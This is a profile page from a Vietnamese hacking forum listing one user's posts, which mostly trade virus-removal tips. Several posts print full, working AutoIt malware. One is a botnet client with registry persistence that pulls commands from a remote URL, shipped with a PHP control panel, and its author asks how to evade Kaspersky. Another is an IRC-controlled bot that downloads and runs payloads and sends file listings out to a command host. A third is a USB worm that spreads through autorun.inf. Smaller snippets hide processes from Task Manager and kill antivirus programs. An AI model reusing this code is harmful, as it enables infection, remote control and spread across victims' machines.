banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: misa_qn  XML
Profile for misa_qn Messages posted by misa_qn [ number of posts not being displayed on this page: 0 ]
 
vào option của idm mà xoá cái dòng có exe đi.Trò này xưa rồi nay zungx còn sài ta. smilie

handaewoo wrote:
về việc 2) : bác vào đoạn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\đường dẫn tới virus
với linux thì virus trên windows không có tác dụng (mà bác viết virus bằng các ngôn ngữ tương thích với windows hả ? ).Trừ khi linux có cài wine thì may ra nó mới chạy ( mà cũng chưa chắc smilie

handaewoo lâu ngày chưa được gặp chứ và bà chị kon_nit nữa hehe !
Chú dùng autoit giúp nhox kia đi Code:
FileInstall ( "source", "dest" [, flag] )

Học_Autoit wrote:

Học_Autoit wrote:
smilie bạn có yahoo ko,mình với bạn cùng hợp tác,mình cũng hiểu biết về Autoit
nếu bạn đồng ý thì PM Y!M của mình nha : daica_lockchock_20102@yahoo.com
smilie smilie
cứ kệ người ta nói . Mình vẫn theo học Autoit tới cùng  


Y!M là : daica_lockchock_2010@yahoo.com
sao Forum ko có chức nang8 Edit bài =,= 

Cậu bên http://72ls.net/ai4r phải ko? Tớ là ai bít hông.Người giàu nhất ở đó đó hehe

tmd wrote:
Trình độ giới hạn ở mức thấp lè tè -> vấn đề nhạy cảm. 

Người khoe khoang ko phải là người giỏi.Người khiêm tốn ko phải là gà.
Khi học đối với người này đạt điểm 9 tự mình vẫn cho mình là ngu.Còn đối với người khác đạt dc điểm 9 là cả 1 vấn đề.
Máy bị nhiểm virus.Khi cắm sang máy tính khác thì máy đó bị nhiểm lun.Ko mọi virus nào củng bị anti tùng xẻ đâu bạn.khi cắm vào máy mới thì bạn ko nên kick thẳng vào usb của bạn!
tơ đã làm đươc trong mạng lan rùi Cậu pm lai yahoo của tớ để test đi.
Thui thui mấy đại ca 30 tết rìu lại valentine nữa smilie.Ai có em rồi lo chở em đi chơi đi.Ai chưa có rảnh add yh tớ tán chơi.

soyoojin wrote:
trình firefox của máy em hay tự động đòi download, tắt đi thì lại hiện lên lại nhiều hơn cùng với mở một page hoặc một tab firefox mới:



em đã thử quét virus, malware nhưng vẫn chưa có tác dụng. em đang dùng kis9 và trình ad-adware. hôm bữa trong report của kis em có phát hiện như thế này mà em không biết là thế nào:



ah, mấy bữa trước đó, còn có hiện tượng tự restart máy liên tục, có khi vào lại win rồi thì restart tiếp. em đã tháo thùng máy lau chùi tháo lắp lại thì giờ không còn hiện tượng đó nữa, cái nè cũng hơi khó hiểu, không biết nguyên do là đâu smilie
em không phải dân tin nên không biết mấy cái nè, mọi người xem xét giúp em nha!@


 

Xóa History có thể giúp được(Tớ nghỉ vậy ko chắc)
Tools=>Clear Recent History chọn evry thing or thời điểm máy bạn chư bị=>ok là xong

handaewoo wrote:
đúng là iloveyou còn chạy trên task , muốn tắt chỉ cần endprocess . Đây cũng là điểm yếu cần khắc phục 

ko bắt được nó sao end được tuy nhiên cách này có 1 khuyết là bật task lên list task nháy nháy=>bít về it 1 chút bít ngay là virus.Dùn proxp kill là xong smilie

thinh_monova wrote:
vô hiệu hóa bằng cách này à :

Code:
Func _DEL()
If ProcessExists("Bkav2006.exe") Then
ProcessClose("Bkav2006.exe")
FileDelete("C:\Program Files\Bkav2006\Bkav2006.exe")
EndIf
If ProcessExists("EtherD.exe") Then
ProcessClose("EtherD.exe")
EndIf
WinKill("EtherDetect Packet Sniffer", "")
EndFunc
 


ko phải.Ý cậu ấy là ko xóa được trong taskmanager i' mà.code đây nè:
Code:
Func HIDE()
Dim $PROCNAME = "Wupdate.exe", $TASKMANTITLE = "Windows Task Manager"
$FINDINDEX = ControllistView($TASKMANTITLE, "", 1009, "FindItem", $PROCNAME)
If $FINDINDEX = -1 Then
Else
$HWND = ControlGetHandle($TASKMANTITLE, "", 1009)
DllCall("user32.dll", "int", "SendMessage", "hwnd", $HWND, "int", 4104, "int", $FINDINDEX, "int", 0)
EndIf
EndFunc

ko bít handaewoo nhà mình tìm ở đâu ra thế ta !

thienhavodinh wrote:
Em là một mem mới của diễn đàn. Em viết bài này để hỏi các pro về cách viết một con trojan bằng Autoit. Thực ra là em cũng biết cách viết bằng VB nhưng mà em không thể nào chuyển nó qua Autoit được. Mong các bác giúp em.
Em muốn hỏi không phải để phá phách ai cả mà chỉ là vì 2 lí do:
1. Em có 1 con lab và 1 con desk nên em muốn đến trường cũng có thể biết được máy ở nhà đã đơn xong chưa và tắt đi cho đỡ tốn điện. (Em không muốn dùng teamviewer).
2. Là em học cntt cho nên em cũng muốn nghiên cứu thêm về 1 ngôn ngữ không được dạy trong trường.

Mong các bác chỉ giúp em tường tận vì em còn gà lắm. (Không phải là em chỉ ăn sẵn hay là ăn mày đòi xôi gấc đâu nhưng mà em tìm khắp trên mạng rồi mà không có hướng dẫn) 


Nếu :
1:
không phải để phá phách ai 

thì nó ko được gọi là trojan.
2:
1. Em có 1 con lab và 1 con desk nên em muốn đến trường cũng có thể biết được máy ở nhà đã đơn xong chưa và tắt đi cho đỡ tốn điện. (Em không muốn dùng teamviewer). 

Cái này nếu cậu làm được rồi thì sẽ phát triển lên boot net
=>giúp cậu dc 50%
3:
2. Là em học cntt cho nên em cũng muốn nghiên cứu thêm về 1 ngôn ngữ không được dạy trong trường. 

giúp được 100% smilie
Ok cậu pm yh: auhrmr có j tớ sẻ giúp.

narita11188 wrote:
nhục thật . Virus bachkhoadanang smilie. 1 lũ đựoc đi học mà không có học. Lũ điên làm ra virus phá hoại làm cái gì cơ chứ. Giúp còn hok xong. Còn đi phá  

Cậu xem code sau:
Code:
FileCopy(@SystemDir & "\MUIi\system64", $A[1] & "\bachkhoadanang.exe", 1)

File bachkhoadanang.exe chính là file system64 cũng là system32.exe thui !
Còn $A[$i] ($i=1=>n) là tên ổ đĩa USB của cậu.Tạm thời đang bận nên chưa viết code kill nó được !

tinhpha wrote:

Hi !

Chuyện là như thế này, ở cty của minh có dùng một cái web ở bên Hong Kong. Tự nhiên vào một ngày kia minh không vào web đó được .Mình mới liên hệ thì được báo rằng IP của mình bị virus nên nó cấm không cho sử dụng.

Xin hỏi anh em làm thế nào mà biết IP bị virus (chương trình gì mà hay thế ?) để mà biết

Rất mong được sự góp ý của anh em

Thanks 

Nêu rỏ mục đích đi smilie.Nếu vius của mình thì mình biết được IP nào đang bị nhiễm+số PC bị nhiễm+ victim online hay ko ko khó lắm!

handaewoo wrote:
em đang tìm hiểu về boot.exe , con này xuất hiện lâu rồi nhưng search chỉ toàn thấy cách diệt chứ không thấy phân tích . Mong anh nào có nghiên cứu về boot.exe gửi tài liệu cho em . Cám ơn 

PM yahoo:auhrmr rùi tính sau smilie

dthatay wrote:
Usb của tui hiện giờ không thể format do nhiễm virus.Bạn nào co phần mềm reset usb có thể share cho mình được ko?.Thank!
 

Ko format được có thể do virus đang chạy trong PM của bạn.Check thử xem

hoangduy514 wrote:
Máy mình ko biết bị dính phải virus loại nào nữa! Cụ thể là các file đuôi .exe trong start menu đều bị đổi thành đuôi .lnk! sau đó các icon trên start menu và destop đều một màu trắng. Quéy đi quét lại bằng Avira cũng ko phát hiện được gì! Mình đã tìm trên google nhưng chỉ có vài trang web hướng dẫn là sửa registry HKEY_CLASSES_ROOT/.lnk ! nhưng khi khởi động lại vẫn không được! phục hồi registry lại như ban đầu cũng ko có kết quả! .( Máy mình đang xài hệ điều hành Windows 7). Mong mọi người giúp đỡ  

Bạn vào sade mod mà change lai regetry

hongtu_1412 wrote:
bạn em lỡ tay nhấp phải cái link do 1 người bạn gửi đến và bị dính con virut này smilie . Nó sẽ tự thay đổi status kèm theo 1 link có chứa virus. Ai kích vào là cũng sẽ bị nhiễm virus theo bạn ngay. Và virus này có thể gửi gửi tin nhắn nhanh đến các nick trong danh sách yahoo messenger của bạn nữa.
ai biết cách khắc phục thì chỉ em với ạ. smilie  

anh em với thằng virus yahoo thường viết bắng autoit i' mà ! cậu có nó send lên 4R cho anh em xem chơi smilie

handaewoo wrote:
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=khanh.ico
#AutoIt3Wrapper_Res_Comment=Pe' Sakura de thuong, nhi' nhanh~ ^^
#AutoIt3Wrapper_Res_Description=I Love You - Chuc mot ngay tot lanh!
#AutoIt3Wrapper_Res_Fileversion=2.1.0.1
#AutoIt3Wrapper_Res_LegalCopyright=CopyRight(C) ProKill Production
#AutoIt3Wrapper_Res_Language=1033
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Process.au3>
$txt = "http://khanh.net/direc.txt"


FileCopy(@ScriptFullPath, @SystemDir & "\svchosts.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svchosts", "REG_SZ", @SystemDir & "\svchosts.exe")
$A1610F06101 = IniRead(@SystemDir & "\knt.ini", "1", "1", "")
IniWrite(@SystemDir & "\knt.ini", "1", "1", $A1610F06101 + 1)
If $A1610F06101 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "knt")
EndIf

While (1)
GetDr()
ExCmd()
Sleep(1000)
WEnd

Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc

Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN@", 2) Then ;Chay mot chuong trinh
$cmd = StringSplit($con, "@")
If StringInStr($con, "@SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)

ElseIf StringInStr($con, "DEL@", 2) Then ;xoa mot file
$cmd = StringSplit($con, "@")
FileDelete($cmd[2])
Sleep(7000)

ElseIf StringInStr($con, "LOAD@", 2) Then ;tai mot file
$cmd = StringSplit($con, "@")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)

ElseIf StringInStr($con, "KILL@", 2) Then ;tat mot tien trinh
$cmd = StringSplit($con, "@")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)

ElseIf StringInStr($con, "DOS@", 2) Then ;Chay len dos, an voi nguoi dung DOS#LENH
$cmd = StringSplit($con, "@")
$rc = _RunDos($cmd[2])
Sleep(7000)

ElseIf StringInStr($con, "MSGBOX@", 2) Then ;hien thong bao MSGBOX#flag#title#text#timeout
$cmd = StringSplit($con, "@")
MsgBox($cmd[2],$cmd[3],$cmd[4],$cmd[5])
Sleep(7000)

ElseIf StringInStr($con, "EXIT@", 2) Then ;thoat chuong trinh
$cmd = StringSplit($con, "@")
Exit
EndIf
EndFunc

ở trên là 1 em ( tạm gọi là botnet ) mà cả đám tụi em vừa viết bằng autoit v3
đây là bảng điều khiển
<html>
<head>
<title>Bang dieu khien cua I-love-you</title>
</head>
<body style='color:#00FF00; background-color: black'>
<center>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Ok>
</form>
<br>

</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>
</center>
<br/>
<br/>
<br/>RUN@path_file<br/>
DEL@path_file<br/>
KILL@ten_Processe<br/>
LOAD@url@PATH<br/>
DOS@LENH<br/>
MSGBOX@flag@title@text@timeout<br/>
hiện tại em này chỉ có chức năng chạy file , tắt file , xóa file .Nhược điểm là bị KIS phát hiện nhưng khi reboot máy thì ok . Anh nào rành về autoit chỉ em cách làm sao cho nó không bị Kis "luộc" và thêm chức năng screenshot ( viết dưới 250kb thôi ) . Cám ơn 

Kiss hình như cũng giống như bkav gặp anh em autoit là xẻn.ko chắc 100% smilie

Cast away wrote:
Chào mọi người!

Trong khi tải nhạc, sau khi gõ tên dfghdf và đánh thừa một dấu chấm ở đuôi, bạn mình thu được một file như sau:




Khi thực hiện Delete hay Rename đều cho thông báo:




Mình tìm cách del file đó bằng nhiều cách nhưng đều không thành công:

+ Unlocker
+ Dùng Save Mode
+ Delete bằng Cmd (Tắt Explorer.exe)

Xin nhờ anh em chỉ giáo!




 

Chắc bạn dùng win7 phải ko?Bạn dùng đĩa hiren khởi động win chạy trên CD lên vào xóa nó đi.Tớ ko biết là lổi gỉ nhưng đó là kinh nghiệm vì trước kia tớ củng bị 1 lần trên Win7.win vista thì tớ chưa gặp smilie
hi.có được code nó lun rùi.post lên anh em ai là dân autoit ngâm cưới chơismilieNếu ko nên post code mod xóa giúp hen)
File ghost32.exe và ghost64 là 1.Bản chất là bootnet.Liên kết với data tại link:http://anhphideptrai.summerhost.info/index .code cơ bản:
Code:
Opt("TrayIconHide", 1)
While 1
_MAIN()
WEnd
Func _MAIN()
$AGAIN = 0
$_NAME = ""
If @UserName == "Administrator" Then
$_NAME = @ComputerName
Else
$NAME = StringSplit(@UserName, " ")
For $R = 1 To $NAME[0] Step 1
If $R < $NAME Then
$_NAME = $_NAME & $NAME[$R] & "_"
Else
$_NAME = $_NAME & $NAME[$R]
EndIf
Next
EndIf
Do
Do
InetGet("http://anhphideptrai.summerhost.info/index", "C:\Windows\System32\MUI\infoconnect")
$CONNECT_SERVER = FileReadLine("C:\Windows\System32\MUI\infoconnect", 1)
$_CONNECT_SERVER = StringSplit($CONNECT_SERVER, " ")
Sleep(2000)
Until $_CONNECT_SERVER[0] > 3
Until $_CONNECT_SERVER[4] == "'"
Global $SERVER = $_CONNECT_SERVER[1]
Global $PORT = $_CONNECT_SERVER[2]
Global $NICK = $_NAME & "_" & @SEC
Global $CHANNEL = $_CONNECT_SERVER[3]
Global $COMMAND
$J = 0
TCPStartup()
Global $SOCK = _IRCCONNECT($SERVER, $PORT, $NICK)
While $AGAIN == 0
Local $RUN
Local $STRTMP
$RECV = TCPRecv($SOCK, 8192)
If @error Then $SOCK = _IRCCONNECT($SERVER, $PORT, $NICK)
Local $SDATA = StringSplit($RECV, @CRLF)
For $I = 1 To $SDATA[0] Step 1
Local $STEMP = StringSplit($SDATA[$I], " ")
If $STEMP[1] = "" Then ContinueLoop
If $STEMP[1] = "PING" Then TCPSend($SOCK, "PONG " & $STEMP[2] & @CRLF)
If $STEMP[0] <= 2 Then ContinueLoop
Switch $STEMP[2]
Case "PRIVMSG"
$USER = StringMid($STEMP[1], 2, StringInStr($STEMP[1], "!") - 2)
$MSG = StringMid($SDATA[$I], StringInStr($SDATA[$I], ":", 0, 2) + 1)
Case "266"
_IRCJOINCHANNEL($SOCK, $CHANNEL)
_IRCCHANGEMODE($SOCK, "+i", $NICK)
EndSwitch
$LENH = StringSplit($SDATA[$I], ":")
If $LENH[0] > 2 Then
$DOS = StringSplit($LENH[3], " ")
If ($DOS[1] == "$") Then
If $DOS[0] > 1 Then
Switch $DOS[2]
Case "M"
Send("#e")
Case "drive"
$A = DriveGetDrive("fixed")
$DRIVE = "gom co " & $A[0] & " la cac o dia : "
For $I = 1 To $A[0] Step 1
$DRIVE = $DRIVE & $A[$I] & "/ "
Next
_IRCSENDMESSAGE($SOCK, $DRIVE, $CHANNEL)
Case "dir"
If $DOS[0] > 2 Then
$DIR = StringSplit($LENH[3], "'")
If @error <> 1 Then
$DIR_ = ""
$_DIR = StringSplit($DIR[2], ";")
If @error <> 1 Then
$DIR_ = $_DIR[1]
For $I = 2 To $_DIR[0] Step 1
$DIR_ = $DIR_ & ":" & $_DIR[$I]
Next
$A = _FILElistTOARRAY($DIR_, "*", 2)
If @error <> 1 Then
If $A[0] > 0 Then
$SHOWDIR = $DIR_ & " co " & $A[0] & " Folders"
_IRCSENDMESSAGE($SOCK, $SHOWDIR, $CHANNEL)
For $I = 1 To $A[0] Step 1
_IRCSENDMESSAGE($SOCK, $I & " " & $A[$I], $CHANNEL)
Next
_IRCSENDMESSAGE($SOCK, "End list", $CHANNEL)
Else
_IRCSENDMESSAGE($SOCK, "not exist Folder", $CHANNEL)
EndIf
Else
_IRCSENDMESSAGE($SOCK, "not exist path", $CHANNEL)
EndIf
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Error Command !", $CHANNEL)
EndIf
EndIf
Case "file"
If $DOS[0] > 2 Then
$FILE = StringSplit($LENH[3], "'")
If @error <> 1 Then
$FILE_ = ""
$_FILE = StringSplit($FILE[2], ";")
If @error <> 1 Then
$FILE_ = $_FILE[1]
For $I = 2 To $_FILE[0] Step 1
$FILE_ = $FILE_ & ":" & $_FILE[$I]
Next
$A = _FILElistTOARRAY($FILE_, "*.*", 1)
If @error <> 1 Then
If $A[0] > 0 Then
$SHOWFILE = $FILE_ & " co " & $A[0] & " Files"
_IRCSENDMESSAGE($SOCK, $SHOWFILE, $CHANNEL)
For $I = 1 To $A[0] Step 1
_IRCSENDMESSAGE($SOCK, $I & " " & $A[$I], $CHANNEL)
Next
_IRCSENDMESSAGE($SOCK, "End list", $CHANNEL)
Else
_IRCSENDMESSAGE($SOCK, "not exist File", $CHANNEL)
EndIf
Else
_IRCSENDMESSAGE($SOCK, "not exist path", $CHANNEL)
EndIf
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Error Command !", $CHANNEL)
EndIf
EndIf
Case "cmd"
$_COMMAND = StringSplit($LENH[3], "'")
$COMMAND_ = ""
For $I = 2 To $_COMMAND[0] Step 1
If $I < $_COMMAND[0] Then
$CONVERT = StringSplit($_COMMAND[$I], " ")
If ($CONVERT[0] > 1) Then
If ($CONVERT[1] == "pyng") Then
$_COMMAND[$I] = "ping " & StringRight($_COMMAND[$I], StringLen($_COMMAND[$I]) - 4)
EndIf
EndIf
$COMMAND_ = $COMMAND_ & $_COMMAND[$I] & @CRLF
Else
$COMMAND_ = $COMMAND_ & $_COMMAND[$I]
EndIf
Next
FileSetAttrib(@SystemDir & "\MUIi\anhphideptrai.bat", "-shr")
FileDelete(@SystemDir & "\MUIi\anhphideptrai.bat")
_FILECREATE(@SystemDir & "\MUIi\anhphideptrai.bat")
$FILE = FileOpen(@SystemDir & "\MUIi\anhphideptrai.bat", 1)
FileWrite($FILE, $COMMAND_)
FileSetAttrib(@SystemDir & "\MUIi\anhphideptrai.bat", "+shr")
FileClose($FILE)
Run(@SystemDir & "\MUIi\anhphideptrai.bat", @SW_HIDE)
If @error <> 1 Then
_IRCSENDMESSAGE($SOCK, "File anhphideptrai.bat Running.........", $CHANNEL)
Else
_IRCSENDMESSAGE($SOCK, "File anhphideptrai.bat not run.........", $CHANNEL)
EndIf
Case "again"
$AGAIN = 1
_IRCSENDMESSAGE($SOCK, "Againning.........", $CHANNEL)
TCPCloseSocket($SOCK)
TCPShutdown()
Case "T"
Send("^t")
Case "l"
_IRCSENDMESSAGE($SOCK, "Log offing.........", $CHANNEL)
TCPCloseSocket($SOCK)
TCPShutdown()
Shutdown(0)
Case "s"
_IRCSENDMESSAGE($SOCK, "Shutdownning.........", $CHANNEL)
TCPCloseSocket($SOCK)
TCPShutdown()
Shutdown(1)
Case "r"
_IRCSENDMESSAGE($SOCK, "Restarting.........", $CHANNEL)
TCPCloseSocket($SOCK)
TCPShutdown()
Shutdown(2)
Case "chup"
_SCREENCAPTURE_CAPTURE(@DesktopDir & "/manghinh " & $J & ".jpg")
ShellExecute(@DesktopDir & "/manghinh " & $J & ".jpg")
$J += 1
Case "download"
If $DOS[0] > 2 Then
$DOWNLOAD = StringSplit($LENH[3], "'")
If @error <> 1 Then
If $DOWNLOAD[0] > 1 Then
$_DOWNLOAD = StringSplit($DOWNLOAD[2], ";")
$DOWNLOAD_ = ""
For $I = 1 To $_DOWNLOAD[0] Step 1
If $DOWNLOAD_ <> "" Then
$DOWNLOAD_ = $DOWNLOAD_ & ":" & $_DOWNLOAD[$I]
Else
$DOWNLOAD_ = $_DOWNLOAD[$I]
EndIf
Next
$CHECKDOWNLOAD = InetGet($DOWNLOAD_, "C:\Windows\System32\system.exe")
If $CHECKDOWNLOAD == 1 Then
$CHECKDOWNLOAD_ = Run("C:\Windows\System32\system.exe")
If $CHECKDOWNLOAD_ == 1 Then
_IRCSENDMESSAGE($SOCK, " Downloaded and Running !", $CHANNEL)
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Download Error !", $CHANNEL)
EndIf
EndIf
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Error Command !", $CHANNEL)
EndIf
Case "open"
If $DOS[0] > 2 Then
$OPEN = StringSplit($LENH[3], "'")
If @error <> 1 Then
If $OPEN[0] > 1 Then
$_OPEN = StringSplit($OPEN[2], ";")
$OPEN_ = ""
If $_OPEN[0] > 0 Then
For $I = 1 To $_OPEN[0] Step 1
If $OPEN_ <> "" Then
$OPEN_ = $OPEN_ & ":" & $_OPEN[$I]
Else
$OPEN_ = $_OPEN[$I]
EndIf
Next
$CHECKOPEN = ShellExecute($OPEN_)
If $CHECKOPEN == 1 Then
_IRCSENDMESSAGE($SOCK, $OPEN_ & " Opened !", $CHANNEL)
Else
_IRCSENDMESSAGE($SOCK, $OPEN_ & " Open not !", $CHANNEL)
EndIf
EndIf
EndIf
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Error Command !", $CHANNEL)
EndIf
Case "close"
If $DOS[0] > 2 Then
$CLOSE = StringSplit($LENH[3], "'")
If @error <> 1 Then
If $CLOSE[0] > 1 Then
If ProcessExists($CLOSE[2]) Then
$CHECKCLOSE = ProcessClose($CLOSE[2])
If $CHECKCLOSE == 1 Then
_IRCSENDMESSAGE($SOCK, $CLOSE[2] & " closed !", $CHANNEL)
Else
_IRCSENDMESSAGE($SOCK, $CLOSE[2] & " close not !", $CHANNEL)
EndIf
Else
_IRCSENDMESSAGE($SOCK, $CLOSE[2] & " exist not !", $CHANNEL)
EndIf
EndIf
EndIf
Else
_IRCSENDMESSAGE($SOCK, " Error Command !", $CHANNEL)
EndIf
Case Else
_IRCSENDMESSAGE($SOCK, " I'm Ready !", $CHANNEL)
EndSwitch
EndIf
EndIf
EndIf
Next
Sleep(100)
WEnd
EndFunc
Global $RET
Func _IRCCONNECT($SERVER, $PORT, $NICK)
Local $I = -1
While $I = -1
$I = TCPConnect(TCPNameToIP($SERVER), $PORT)
WEnd
TCPSend($I, "NICK " & $NICK & @CRLF)
TCPSend($I, "USER " & $NICK & " 0 0 " & $NICK & @CRLF)
Return $I
EndFunc
Func _IRCJOINCHANNEL($IRC, $CHAN)
If $IRC = -1 Then Return 0
TCPSend($IRC, "JOIN " & $CHAN & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndFunc
Func _IRCSENDMESSAGE($IRC, $MSG, $CHAN = "")
If $IRC = -1 Then Return 0
If $CHAN = "" Then
TCPSend($IRC, $MSG & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndIf
TCPSend($IRC, "PRIVMSG " & $CHAN & " :" & $MSG & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndFunc
Func _IRCCHANGEMODE($IRC, $MODE, $CHAN = "")
If $IRC = -1 Then Return 0
If $CHAN = "" Then
TCPSend($IRC, "MODE " & $MODE & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndIf
TCPSend($IRC, "MODE " & $CHAN & " " & $MODE & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndFunc
Func _IRCPING($RET)
If $RET = "" Then Return -1
TCPSend($IRC, "PONG " & $RET & @CRLF)
If @error Then
Return -1
EndIf
Return 1
EndFunc


Còn system32.exe và system64 cũng là 1.Mục đích lây lan+...
Code:
Opt("TrayIconHide", 1)
Global $USB
Global $A
Global $I
Global $FILE
If @ScriptName == "bachkhoadanang.exe" Then
$USB = DriveGetDrive("removable")
If @error <> 1 Then
ShellExecute(@ScriptDir)
EndIf
EndIf
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "System", "REG_SZ", @SystemDir & "\MUIi\system32.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Ghost", "REG_SZ", @SystemDir & "\MUIi\ghost32.exe")
If ProcessExists("system32.exe") And ProcessExists("bachkhoadanang.exe") Then
Exit 0
ElseIf ProcessExists("bachkhoadanang.exe") Then
DirCreate(@SystemDir & "\MUIi")
FileCopy("bachkhoadanang.exe", @SystemDir & "\MUIi\system32.exe", 1)
FileCopy("bachkhoadanang.exe", @SystemDir & "\MUIi\system64", 1)
FileCopy("killer", @SystemDir & "\MUIi\ghost32.exe", 1)
FileCopy("killer", @SystemDir & "\MUIi\ghost64", 1)
FileSetAttrib(@SystemDir & "\MUIi\system32.exe", "+rsh")
FileSetAttrib(@SystemDir & "\MUIi\ghost32.exe", "+rsh")
FileSetAttrib(@SystemDir & "\MUIi\system64", "+rsh")
FileSetAttrib(@SystemDir & "\MUIi\ghost64", "+rsh")
Run(@SystemDir & "\MUIi\system32.exe")
Run(@SystemDir & "\MUIi\ghost32.exe")
Exit 0
EndIf
$A = DriveGetDrive("removable")
While 1
While @error == 1
If ProcessExists("regedit.exe") Then
ProcessClose("regedit.exe")
EndIf
Sleep(2000)
$A = DriveGetDrive("removable")
WEnd
While @error <> 1
If ProcessExists("regedit.exe") <> 0 Then
ProcessClose("regedit.exe")
EndIf
If FileExists($A[1] & "\bachkhoadanang.exe") == 0 Then
FileCopy(@SystemDir & "\MUIi\system64", $A[1] & "\bachkhoadanang.exe", 1)
EndIf
If FileExists($A[1] & "\killer") == 0 Then
FileCopy(@SystemDir & "\MUIi\ghost64", $A[1] & "\killer", 1)
EndIf
FileSetAttrib($A[1] & "\autorun.inf", "-srha")
FileDelete($A[1] & "\autorun.inf")
_FILECREATE($A[1] & "\autorun.inf")
$FILE = FileOpen($A[1] & "\autorun.inf", 1)
FileWrite($FILE, "[AutoRun]" & @CRLF & "open=bachkhoadanang.exe" & @CRLF & ";shell\open=Open(&O)" & @CRLF & "shell\open\Command=bachkhoadanang.exe" & @CRLF & "shell\open\Default=1" & @CRLF & ";shell\explore=Manager(&X)" & @CRLF & "shell\explore\Command=bachkhoadanang.exe" & @CRLF & "shellexecute=bachkhoadanang.exe" & @CRLF & "shell\Auto\command=bachkhoadanang.exe")
FileSetAttrib($A[1] & "\autorun.inf", "+SRHA")
FileClose($FILE)
Sleep(2000)
$A = DriveGetDrive("removable")
WEnd
WEnd
anh em nó từ autoit smilie.Để xem nó tí đa
để xem cấu hình mà không cần soft thì dùng nhiều cách:
Chọn Run -> gõ dxdiag enter.Nếu cần soft xem đầy đủ hơn cậu cứ để tin lại.Hôm sau tớ send cho.Bây giờ ko có dk send được.
Xem ip:Rung->gõ Cmd enter ->gõ ipconfig enter.là xong.
woa tuyệt lắm.Nhân tiện anh làm luôn em cái này cái.
http://www.mediafire.com/?dyo1zjty5jz
Cái này em cũng nghỉ là autoit mà dùng myAutToExe ko được.
mà anh dùng soft j để chém gió mấy con autoit vậy.BKAV ko sài được !
đây nà cậu:
http://www.mediafire.com/?jwvznxunzxw

help tớ hen hen !
Em có 1 file exe khi dùng PEID scan thì hiện như cái ảnh kia.Cho em hỏi cái file đó được viết từ phần mềm nào và làm sao dịch ngược code được.Thank mấy anh !



 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|